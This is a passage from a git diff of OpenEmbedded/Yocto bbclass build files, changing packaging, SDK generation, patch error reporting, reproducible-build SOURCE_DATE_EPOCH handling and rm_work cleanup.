+            json.dump(extended_data, f, sort_keys=True, separators=(",", ":"))
+
         # Symlinks needed for rprovides lookup
         rprov = d.getVar('RPROVIDES_%s' % pkg) or d.getVar('RPROVIDES')
         if rprov:
@@ -1581,7 +1644,8 @@ fi
         write_extra_runtime_pkgs(global_variants, packages, pkgdatadir)
 
 }
-emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides"
+emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides ${PKGDESTWORK}/extended"
+emit_pkgdata[vardepsexclude] = "BB_NUMBER_THREADS"
 
 ldconfig_postinst_fragment() {
 if [ x"$D" = "x" ]; then
@@ -1589,7 +1653,7 @@ if [ x"$D" = "x" ]; then
 fi
 }
 
-RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps"
+RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps --define '__font_provides %{nil}'"
 
 # Collect perfile run-time dependency metadata
 # Output:
@@ -1958,12 +2022,12 @@ python package_do_pkgconfig () {
     for pkg in packages.split():
         pkgconfig_provided[pkg] = []
         pkgconfig_needed[pkg] = []
-        for file in pkgfiles[pkg]:
+        for file in sorted(pkgfiles[pkg]):
                 m = pc_re.match(file)
                 if m:
                     pd = bb.data.init()
                     name = m.group(1)
-                    pkgconfig_provided[pkg].append(name)
+                    pkgconfig_provided[pkg].append(os.path.basename(name))
                     if not os.access(file, os.R_OK):
                         continue
                     with open(file, 'r') as f:
@@ -1986,7 +2050,7 @@ python package_do_pkgconfig () {
         pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist")
         if pkgconfig_provided[pkg] != []:
             with open(pkgs_file, 'w') as f:
-                for p in pkgconfig_provided[pkg]:
+                for p in sorted(pkgconfig_provided[pkg]):
                     f.write('%s\n' % p)
 
     # Go from least to most specific since the last one found wins
@@ -2225,7 +2289,7 @@ python do_package () {
     # cache.  This is useful if an item this class depends on changes in a
     # way that the output of this class changes.  rpmdeps is a good example
     # as any change to rpmdeps requires this to be rerun.
-    # PACKAGE_BBCLASS_VERSION = "2"
+    # PACKAGE_BBCLASS_VERSION = "4"
 
     # Init cachedpath
     global cpath
@@ -2251,7 +2315,7 @@ python do_package () {
         package_qa_handle_error("var-undefined", msg, d)
         return
 
-    bb.build.exec_func("package_get_auto_pr", d)
+    bb.build.exec_func("package_convert_pr_autoinc", d)
 
     ###########################################################################
     # Optimisations
@@ -2323,9 +2387,21 @@ addtask do_package_setscene
 # Copy from PKGDESTWORK to tempdirectory as tempdirectory can be cleaned at both
 # do_package_setscene and do_packagedata_setscene leading to races
 python do_packagedata () {
+    bb.build.exec_func("package_get_auto_pr", d)
+
     src = d.expand("${PKGDESTWORK}")
     dest = d.expand("${WORKDIR}/pkgdata-pdata-input")
     oe.path.copyhardlinktree(src, dest)
+
+    bb.build.exec_func("packagedata_translate_pr_autoinc", d)
+}
+do_packagedata[cleandirs] += "${WORKDIR}/pkgdata-pdata-input"
+
+# Translate the EXTENDPRAUTO and AUTOINC to the final values
+packagedata_translate_pr_autoinc() {
+    find ${WORKDIR}/pkgdata-pdata-input -type f | xargs --no-run-if-empty \
+        sed -e 's,@PRSERV_PV_AUTOINC@,${PRSERV_PV_AUTOINC},g' \
+            -e 's,@EXTENDPRAUTO@,${EXTENDPRAUTO},g' -i
 }
 
 addtask packagedata before do_build after do_package
diff --git a/meta/classes/package_deb.bbclass b/meta/classes/package_deb.bbclass
index 790b26aef2..fa8c6c82ff 100644
--- a/meta/classes/package_deb.bbclass
+++ b/meta/classes/package_deb.bbclass
@@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}"
 do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}"
 do_package_write_deb[umask] = "022"
 do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_deb after do_packagedata do_package
-
+EPOCHTASK ??= ""
+addtask package_write_deb after do_packagedata do_package ${EPOCHTASK}
 
 PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot"
 PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot"
diff --git a/meta/classes/package_ipk.bbclass b/meta/classes/package_ipk.bbclass
index c008559e4a..4927cfba00 100644
--- a/meta/classes/package_ipk.bbclass
+++ b/meta/classes/package_ipk.bbclass
@@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}"
 do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}"
 do_package_write_ipk[umask] = "022"
 do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_ipk after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK}
 
 PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot"
 PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot"
diff --git a/meta/classes/package_pkgdata.bbclass b/meta/classes/package_pkgdata.bbclass
index 18b7ed62e0..a1ea8fc041 100644
--- a/meta/classes/package_pkgdata.bbclass
+++ b/meta/classes/package_pkgdata.bbclass
@@ -162,6 +162,6 @@ python package_prepare_pkgdata() {
 
 }
 package_prepare_pkgdata[cleandirs] = "${WORKDIR_PKGDATA}"
-package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA"
+package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA SSTATETASKS"
 
 
diff --git a/meta/classes/package_rpm.bbclass b/meta/classes/package_rpm.bbclass
index 9145717f98..65587d228b 100644
--- a/meta/classes/package_rpm.bbclass
+++ b/meta/classes/package_rpm.bbclass
@@ -678,10 +678,12 @@ python do_package_rpm () {
     cmd = cmd + " --define '_use_internal_dependency_generator 0'"
     cmd = cmd + " --define '_binaries_in_noarch_packages_terminate_build 0'"
     cmd = cmd + " --define '_build_id_links none'"
-    cmd = cmd + " --define '_binary_payload w6T.xzdio'"
-    cmd = cmd + " --define '_source_payload w6T.xzdio'"
+    cmd = cmd + " --define '_binary_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
+    cmd = cmd + " --define '_source_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
     cmd = cmd + " --define 'clamp_mtime_to_source_date_epoch 1'"
+    cmd = cmd + " --define 'use_source_date_epoch_as_buildtime 1'"
     cmd = cmd + " --define '_buildhost reproducible'"
+    cmd = cmd + " --define '__font_provides %{nil}'"
     if perfiledeps:
         cmd = cmd + " --define '__find_requires " + outdepends + "'"
         cmd = cmd + " --define '__find_provides " + outprovides + "'"
@@ -741,7 +743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}"
 do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}"
 do_package_write_rpm[umask] = "022"
 do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_rpm after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK}
 
 PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot"
 PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot"
diff --git a/meta/classes/patch.bbclass b/meta/classes/patch.bbclass
index 25ec089ae1..484d27ac76 100644
--- a/meta/classes/patch.bbclass
+++ b/meta/classes/patch.bbclass
@@ -131,6 +131,9 @@ python patch_do_patch() {
             patchdir = parm["patchdir"]
             if not os.path.isabs(patchdir):
                 patchdir = os.path.join(s, patchdir)
+            if not os.path.isdir(patchdir):
+                bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" %
+                    (patchdir, parm["patchdir"], parm['patchname']))
         else:
             patchdir = s
 
@@ -147,12 +150,12 @@ python patch_do_patch() {
             patchset.Import({"file":local, "strippath": parm['striplevel']}, True)
         except Exception as exc:
             bb.utils.remove(process_tmpdir, True)
-            bb.fatal(str(exc))
+            bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc)))
         try:
             resolver.Resolve()
         except bb.BBHandledException as e:
             bb.utils.remove(process_tmpdir, True)
-            bb.fatal(str(e))
+            bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e)))
 
     bb.utils.remove(process_tmpdir, True)
     del os.environ['TMPDIR']
diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass
index 3e5b1359d6..49fdfaa93d 100644
--- a/meta/classes/populate_sdk_base.bbclass
+++ b/meta/classes/populate_sdk_base.bbclass
@@ -51,6 +51,8 @@ TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
 SDK_ARCHIVE_TYPE ?= "tar.xz"
 SDK_XZ_COMPRESSION_LEVEL ?= "-9"
 SDK_XZ_OPTIONS ?= "${XZ_DEFAULTS} ${SDK_XZ_COMPRESSION_LEVEL}"
+SDK_ZIP_OPTIONS ?= "-y"
+
 
 # To support different sdk type according to SDK_ARCHIVE_TYPE, now support zip and tar.xz
 python () {
@@ -58,7 +60,7 @@ python () {
        d.setVar('SDK_ARCHIVE_DEPENDS', 'zip-native')
        # SDK_ARCHIVE_CMD used to generate archived sdk ${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} from input dir ${SDK_OUTPUT}/${SDKPATH} to output dir ${SDKDEPLOYDIR}
        # recommand to cd into input dir first to avoid archive with buildpath
-       d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r -y ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
+       d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r ${SDK_ZIP_OPTIONS} ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
     else:
        d.setVar('SDK_ARCHIVE_DEPENDS', 'xz-native')
        d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; tar ${SDKTAROPTS} -cf - . | xz ${SDK_XZ_OPTIONS} > ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE}')
@@ -66,7 +68,7 @@ python () {
 
 SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}"
 SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross"
-PATH_prepend = "${STAGING_DIR_HOST}${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
+PATH_prepend = "${WORKDIR}/recipe-sysroot/${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
 SDK_DEPENDS += "nativesdk-glibc-locale"
 
 # We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it
@@ -178,6 +180,8 @@ do_populate_sdk[sstate-inputdirs] = "${SDKDEPLOYDIR}"
 do_populate_sdk[sstate-outputdirs] = "${SDK_DEPLOY}"
 do_populate_sdk[stamp-extra-info] = "${MACHINE_ARCH}${SDKMACHINE}"
 
+PSEUDO_IGNORE_PATHS .= ",${SDKDEPLOYDIR},${WORKDIR}/oe-sdk-repo,${WORKDIR}/sstate-build-populate_sdk"
+
 fakeroot create_sdk_files() {
 	cp ${COREBASE}/scripts/relocate_sdk.py ${SDK_OUTPUT}/${SDKPATH}/
 
@@ -256,7 +260,7 @@ fakeroot create_shar() {
 
 	rm -f ${T}/pre_install_command ${T}/post_install_command
 
-	if [ ${SDK_RELOCATE_AFTER_INSTALL} -eq 1 ] ; then
+	if [ "${SDK_RELOCATE_AFTER_INSTALL}" = "1" ] ; then
 		cp ${TOOLCHAIN_SHAR_REL_TMPL} ${T}/post_install_command
 	fi
 	cat << "EOF" >> ${T}/pre_install_command
@@ -273,6 +277,7 @@ EOF
 	# substitute variables
 	sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \
 		-e 's#@SDKPATH@#${SDKPATH}#g' \
+		-e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \
 		-e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \
 		-e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \
 		-e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \
@@ -322,6 +327,13 @@ def sdk_variables(d):
 
 do_populate_sdk[vardeps] += "${@sdk_variables(d)}"
 
+python () {
+    variables = sdk_command_variables(d)
+    for var in variables:
+        if d.getVar(var, False):
+            d.setVarFlag(var, 'func', '1')
+}
+
 do_populate_sdk[file-checksums] += "${TOOLCHAIN_SHAR_REL_TMPL}:True \
                                     ${TOOLCHAIN_SHAR_EXT_TMPL}:True"
 
diff --git a/meta/classes/populate_sdk_ext.bbclass b/meta/classes/populate_sdk_ext.bbclass
index 71686bc993..1bdfd92847 100644
--- a/meta/classes/populate_sdk_ext.bbclass
+++ b/meta/classes/populate_sdk_ext.bbclass
@@ -117,7 +117,7 @@ python write_host_sdk_ext_manifest () {
                 f.write("%s %s %s\n" % (info[1], info[2], info[3]))
 }
 
-SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = "write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "    
+SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = " write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "    
 
 SDK_TITLE_task-populate-sdk-ext = "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} Extensible SDK"
 
@@ -247,7 +247,9 @@ python copy_buildsystem () {
 
     # Create a layer for new recipes / appends
     bbpath = d.getVar('BBPATH')
-    bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')])
+    env = os.environ.copy()
+    env['PYTHONDONTWRITEBYTECODE'] = '1'
+    bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')], env=env)
 
     # Create bblayers.conf
     bb.utils.mkdirhier(baseoutpath + '/conf')
@@ -360,6 +362,10 @@ python copy_buildsystem () {
             # Hide the config information from bitbake output (since it's fixed within the SDK)
             f.write('BUILDCFG_HEADER = ""\n\n')
 
+            # Write METADATA_REVISION
+            # Needs distro override so it can override the value set in the bbclass code (later than local.conf)
+            f.write('METADATA_REVISION:%s = "%s"\n\n' % (d.getVar('DISTRO'), d.getVar('METADATA_REVISION')))
+
             f.write('# Provide a flag to indicate we are in the EXT_SDK Context\n')
             f.write('WITHIN_EXT_SDK = "1"\n\n')
 
@@ -664,7 +670,7 @@ sdk_ext_postinst() {
 
 	# A bit of another hack, but we need this in the path only for devtool
 	# so put it at the end of $PATH.
-	echo "export PATH=$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH" >> $env_setup_script
+	echo "export PATH=\"$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH\"" >> $env_setup_script
 
 	echo "printf 'SDK environment now set up; additionally you may now run devtool to perform development tasks.\nRun devtool --help for further details.\n'" >> $env_setup_script
 
diff --git a/meta/classes/pypi.bbclass b/meta/classes/pypi.bbclass
index 87b4c85fc0..c68367449a 100644
--- a/meta/classes/pypi.bbclass
+++ b/meta/classes/pypi.bbclass
@@ -24,3 +24,5 @@ S = "${WORKDIR}/${PYPI_PACKAGE}-${PV}"
 
 UPSTREAM_CHECK_URI ?= "https://pypi.org/project/${PYPI_PACKAGE}/"
 UPSTREAM_CHECK_REGEX ?= "/${PYPI_PACKAGE}/(?P<pver>(\d+[\.\-_]*)+)/"
+
+CVE_PRODUCT ?= "python:${PYPI_PACKAGE}"
diff --git a/meta/classes/python3native.bbclass b/meta/classes/python3native.bbclass
index d98fb4c758..2e3a88c126 100644
--- a/meta/classes/python3native.bbclass
+++ b/meta/classes/python3native.bbclass
@@ -17,8 +17,6 @@ export STAGING_LIBDIR
 export PYTHON_LIBRARY="${STAGING_LIBDIR}/lib${PYTHON_DIR}${PYTHON_ABI}.so"
 export PYTHON_INCLUDE_DIR="${STAGING_INCDIR}/${PYTHON_DIR}${PYTHON_ABI}"
 
-export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
-
 # suppress host user's site-packages dirs.
 export PYTHONNOUSERSITE = "1"
 
diff --git a/meta/classes/python3targetconfig.bbclass b/meta/classes/python3targetconfig.bbclass
new file mode 100644
index 0000000000..a6e67f1bf8
--- /dev/null
+++ b/meta/classes/python3targetconfig.bbclass
@@ -0,0 +1,29 @@
+inherit python3native
+
+EXTRA_PYTHON_DEPENDS ?= ""
+EXTRA_PYTHON_DEPENDS_class-target = "python3"
+DEPENDS_append = " ${EXTRA_PYTHON_DEPENDS}"
+
+do_configure_prepend_class-target() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile_prepend_class-target() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install_prepend_class-target() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_configure:prepend:class-nativesdk() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile:prepend:class-nativesdk() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install:prepend:class-nativesdk() {
+        export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
diff --git a/meta/classes/qemuboot.bbclass b/meta/classes/qemuboot.bbclass
index 648af09b6e..92ae69d9f2 100644
--- a/meta/classes/qemuboot.bbclass
+++ b/meta/classes/qemuboot.bbclass
@@ -7,6 +7,7 @@
 # QB_OPT_APPEND: options to append to qemu, e.g., "-show-cursor"
 #
 # QB_DEFAULT_KERNEL: default kernel to boot, e.g., "bzImage"
+#                                            e.g., "bzImage-initramfs-qemux86-64.bin" if INITRAMFS_IMAGE_BUNDLE is set to 1.
 #
 # QB_DEFAULT_FSTYPE: default FSTYPE to boot, e.g., "ext4"
 #
@@ -75,7 +76,7 @@
 
 QB_MEM ?= "-m 256"
 QB_SERIAL_OPT ?= "-serial mon:stdio -serial null"
-QB_DEFAULT_KERNEL ?= "${KERNEL_IMAGETYPE}"
+QB_DEFAULT_KERNEL ?= "${@bb.utils.contains("INITRAMFS_IMAGE_BUNDLE", "1", "${KERNEL_IMAGETYPE}-${INITRAMFS_LINK_NAME}.bin", "${KERNEL_IMAGETYPE}", d)}"
 QB_DEFAULT_FSTYPE ?= "ext4"
 QB_OPT_APPEND ?= "-show-cursor"
 QB_NETWORK_DEVICE ?= "-device virtio-net-pci,netdev=net0,mac=@MAC@"
diff --git a/meta/classes/report-error.bbclass b/meta/classes/report-error.bbclass
index 1a12db1206..de48e4ff0f 100644
--- a/meta/classes/report-error.bbclass
+++ b/meta/classes/report-error.bbclass
@@ -64,6 +64,8 @@ python errorreport_handler () {
             data['failures'] = []
             data['component'] = " ".join(e.getPkgs())
             data['branch_commit'] = str(base_detect_branch(e.data)) + ": " + str(base_detect_revision(e.data))
+            data['bitbake_version'] = e.data.getVar("BB_VERSION")
+            data['layer_version'] = get_layers_branch_rev(e.data)
             data['local_conf'] = get_conf_data(e, 'local.conf')
             data['auto_conf'] = get_conf_data(e, 'auto.conf')
             lock = bb.utils.lockfile(datafile + '.lock')
diff --git a/meta/classes/reproducible_build.bbclass b/meta/classes/reproducible_build.bbclass
index 2f3bd90b07..3c01dbd5b3 100644
--- a/meta/classes/reproducible_build.bbclass
+++ b/meta/classes/reproducible_build.bbclass
@@ -1,17 +1,38 @@
 # reproducible_build.bbclass
 #
-# Sets SOURCE_DATE_EPOCH in each component's build environment.
+# Sets the default SOURCE_DATE_EPOCH in each component's build environment.
+# The format is number of seconds since the system epoch.
+#
 # Upstream components (generally) respect this environment variable,
 # using it in place of the "current" date and time.
 # See https://reproducible-builds.org/specs/source-date-epoch/
 #
-# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH.
-# This value should be reproducible for anyone who builds the same revision from the same sources.
+# The default value of SOURCE_DATE_EPOCH comes from the function
+# get_source_date_epoch_value which reads from the SDE_FILE, or if the file
+# is not available (or set to 0) will use the fallback of
+# SOURCE_DATE_EPOCH_FALLBACK.
+#
+# The SDE_FILE is normally constructed from the function
+# create_source_date_epoch_stamp which is typically added as a postfuncs to
+# the do_unpack task.  If a recipe does NOT have do_unpack, it should be added
+# to a task that runs after the source is available and before the
+# do_deploy_source_date_epoch task is executed.
+#
+# If a recipe wishes to override the default behavior it should set it's own
+# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task
+# with recipe-specific functionality to write the appropriate
+# SOURCE_DATE_EPOCH into the SDE_FILE.
+#
+# SOURCE_DATE_EPOCH is intended to be a reproducible value.  This value should
+# be reproducible for anyone who builds the same revision from the same
+# sources.
 #
-# There are 4 ways we determine SOURCE_DATE_EPOCH:
+# There are 4 ways the create_source_date_epoch_stamp function determines what
+# becomes SOURCE_DATE_EPOCH:
 #
 # 1. Use the value from __source_date_epoch.txt file if this file exists.
-#    This file was most likely created in the previous build by one of the following methods 2,3,4.
+#    This file was most likely created in the previous build by one of the
+#    following methods 2,3,4.
 #    Alternatively, it can be provided by a recipe via SRC_URI.
 #
 # If the file does not exist:
@@ -22,25 +43,24 @@
 # 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ...
 #    This works for well-kept repositories distributed via tarball.
 #
-# 4. Use the modification time of the youngest file in the source tree, if there is one.
+# 4. Use the modification time of the youngest file in the source tree, if
+#    there is one.
 #    This will be the newest file from the distribution tarball, if any.
 #
-# 5. Fall back to a fixed timestamp.
+# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK).
 #
-# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE.
-# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task
-# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE.
-#
-# If this file is found by other tasks, the value is exported in the SOURCE_DATE_EPOCH variable.
-# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...)
+# Once the value is determined, it is stored in the recipe's SDE_FILE.
 
 BUILD_REPRODUCIBLE_BINARIES ??= '1'
-inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')}
+inherit reproducible_build_simple
 
-SDE_DIR ="${WORKDIR}/source-date-epoch"
+SDE_DIR = "${WORKDIR}/source-date-epoch"
 SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt"
 SDE_DEPLOYDIR = "${WORKDIR}/deploy-source-date-epoch"
 
+# A SOURCE_DATE_EPOCH of '0' might be misinterpreted as no SDE
+export SOURCE_DATE_EPOCH_FALLBACK ??= "1302044400"
+
 SSTATETASKS += "do_deploy_source_date_epoch"
 
 do_deploy_source_date_epoch () {
@@ -74,45 +94,47 @@ python create_source_date_epoch_stamp() {
     import oe.reproducible
 
     epochfile = d.getVar('SDE_FILE')
-    # If it exists we need to regenerate as the sources may have changed
-    if os.path.isfile(epochfile):
-        bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile)
-        os.remove(epochfile)
+    tmp_file = "%s.new" % epochfile
 
     source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S'))
 
     bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
     bb.utils.mkdirhier(d.getVar('SDE_DIR'))
-    with open(epochfile, 'w') as f:
+    with open(tmp_file, 'w') as f:
         f.write(str(source_date_epoch))
+
+    os.rename(tmp_file, epochfile)
 }
 
+EPOCHTASK = "do_deploy_source_date_epoch"
+
+# Generate the stamp after do_unpack runs
+do_unpack[postfuncs] += "create_source_date_epoch_stamp"
+
 def get_source_date_epoch_value(d):
-    cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH')
-    if cached:
+    epochfile = d.getVar('SDE_FILE')
+    cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None)
+    if cached and efile == epochfile:
         return cached
 
-    epochfile = d.getVar('SDE_FILE')
-    source_date_epoch = 0
-    if os.path.isfile(epochfile):
+    if cached and epochfile != efile:
+        bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile))
+
+    source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
+    try:
         with open(epochfile, 'r') as f:
             s = f.read()
             try:
                 source_date_epoch = int(s)
             except ValueError:
-                bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to 0" % s)
-                source_date_epoch = 0
+                bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s)
+                source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
         bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
-    else:
+    except FileNotFoundError:
         bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch))
 
-    d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch))
+    d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile))
     return str(source_date_epoch)
 
 export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}"
 BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH"
-
-python () {
-    if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1':
-        d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp")
-}
diff --git a/meta/classes/rm_work.bbclass b/meta/classes/rm_work.bbclass
index 01c2ab1c78..24051aa378 100644
--- a/meta/classes/rm_work.bbclass
+++ b/meta/classes/rm_work.bbclass
@@ -27,6 +27,13 @@ BB_SCHEDULER ?= "completion"
 BB_TASK_IONICE_LEVEL_task-rm_work = "3.0"
 
 do_rm_work () {
+    # Force using the HOSTTOOLS 'rm' - otherwise the SYSROOT_NATIVE 'rm' can be selected depending on PATH
+    # Avoids race-condition accessing 'rm' when deleting WORKDIR folders at the end of this function
+    RM_BIN="$(PATH=${HOSTTOOLS_DIR} command -v rm)"
+    if [ -z "${RM_BIN}" ]; then
+        bbfatal "Binary 'rm' not found in HOSTTOOLS_DIR, cannot remove WORKDIR data."
+    fi
+
     # If the recipe name is in the RM_WORK_EXCLUDE, skip the recipe.
     for p in ${RM_WORK_EXCLUDE}; do
         if [ "$p" = "${PN}" ]; then
@@ -73,7 +80,7 @@ do_rm_work () {
             # sstate version since otherwise we'd need to leave 'plaindirs' around
             # such as 'packages' and 'packages-split' and these can be large. No end
             # of chain tasks depend directly on do_package anymore.
-            rm -f $i;
+            "${RM_BIN}" -f -- $i;
             ;;
         *_setscene*)
             # Skip stamps which are already setscene versions
@@ -90,7 +97,7 @@ do_rm_work () {
                     ;;
                 esac
             done
-            rm -f $i
+            "${RM_BIN}" -f -- $i
         esac
     done
 
@@ -100,9 +107,9 @@ do_rm_work () {
         # Retain only logs and other files in temp, safely ignore
         # failures of removing pseudo folers on NFS2/3 server.
         if [ $dir = 'pseudo' ]; then
-            rm -rf $dir 2> /dev/null || true
+            "${RM_BIN}" -rf -- $dir 2> /dev/null || true
         elif ! echo "$excludes" | grep -q -w "$dir"; then
-            rm -rf $dir
+            "${RM_BIN}" -rf -- $dir
         fi
     done
 }
diff --git a/meta/classes/rootfs-postcommands.bbclass b/meta/classes/rootfs-postcommands.bbclass
index c43b9a9823..943534c57a 100644
--- a/meta/classes/rootfs-postcommands.bbclass
+++ b/meta/classes/rootfs-postcommands.bbclass
@@ -1,6 +1,6 @@
 
 # Zap the root password if debug-tweaks feature is not enabled
-ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password ; ",d)}'
+ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password; ",d)}'
 
 # Allow dropbear/openssh to accept logins from accounts with an empty password string if debug-tweaks or allow-empty-password is enabled
 ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'allow-empty-password' ], "ssh_allow_empty_password; ", "",d)}'
@@ -12,7 +12,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'deb
